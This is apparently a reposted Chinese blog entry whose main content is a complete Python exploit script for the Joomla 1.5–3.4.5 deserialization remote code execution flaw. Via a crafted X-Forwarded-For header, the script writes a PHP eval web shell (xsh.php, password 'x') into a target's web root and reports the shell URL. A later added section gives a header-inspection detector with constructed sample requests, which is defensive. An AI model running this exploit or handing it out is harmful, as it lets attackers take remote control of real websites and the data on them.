  • Joomla! [1.5-3.4.5] deserialization remote code execution EXP (writes a shell directly)

    Usage: x.py http://xxx.com

    # coding=utf-8
    # author:KuuKi
    # Help: joomla 1.5-3.4.5 unserialize remote code execution

    import urllib2
    import cookielib,sys
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    urllib2.socket.setdefaulttimeout(10)

    payload = 'file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."xsh.php","x3C".chr(63)."@eval(x5Cx24_POST[x]);")'

    forward = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"x5C0x5C0x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:' + str(len(payload)+28) + ':"' + payload + ';JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"x5C0x5C0x5C0connection";b:1;}xF0x9Dx8Cx86'
    req = urllib2.Request(url=sys.argv[1],headers={'x-forwarded-for':forward})
    opener.open(req)
    req = urllib2.Request(url=sys.argv[1])
    if 'SimplePie_Misc::parse_url' in opener.open(req).read():
        print 'Shell: '+ sys.argv[1] + '/xsh.php Password: x'
    else:
        print 'Not vulnerable!'
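
A detection-side counterpart to the script above, added here as an example and not part of the original post: it flags request headers that carry the markers visible in the `forward` string (a PHP serialized object, a `|` session delimiter spliced in front of it, and a trailing 4-byte UTF-8 character). The function names, the `WATCHED` header list and the sample requests are assumptions constructed for illustration; header values are assumed to be decoded as UTF-8.

```python
import re

# Start of a PHP serialized object, e.g. O:21:"JDatabaseDriverMysqli":3:{
PHP_OBJECT = re.compile(r'O:\d+:"[\w\\]+":\d+:\{')
# Session-record delimiter directly followed by a serialized value, e.g. __test|O:21:
SESSION_SPLICE = re.compile(r'\w\|[OaCsib]:\d')
# Headers whose values the application may store; the page's script uses x-forwarded-for.
WATCHED = ("x-forwarded-for", "user-agent")  # assumption: extend per deployment


def inspect_headers(headers):
    """Return a sorted list of findings for one request's headers (dict of str -> str)."""
    findings = set()
    for name, value in headers.items():
        if name.lower() not in WATCHED:
            continue
        if PHP_OBJECT.search(value):
            findings.add("php-serialized-object")
        if SESSION_SPLICE.search(value):
            findings.add("session-delimiter-splice")
        # Code points above U+FFFF need 4 bytes in UTF-8, like the tail of `forward`.
        if any(ord(ch) > 0xFFFF for ch in value):
            findings.add("4-byte-utf8-char")
    return sorted(findings)


def triage(requests):
    """Map request id -> findings, keeping only requests with at least one finding."""
    return {rid: f for rid, h in requests.items() if (f := inspect_headers(h))}


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "r1": {"X-Forwarded-For": "203.0.113.7, 198.51.100.2", "User-Agent": "Mozilla/5.0"},
    "r2": {"X-Forwarded-For": '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";b:1;}\U0001d306'},
    "r3": {"User-Agent": "Feedbot \U0001f600"},   # emoji only: weak signal on its own
    "r4": {"Accept": 'O:8:"stdClass":0:{}'},      # unwatched header: ignored
}

if __name__ == "__main__":
    for rid, findings in triage(SAMPLES).items():
        print(rid, findings)
```

A request that trips all three findings at once, as `r2` does, is the strong signal; a lone 4-byte character is common in legitimate traffic and should only raise the score.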

  • Original article: https://www.cnblogs.com/milantgh/p/5193723.html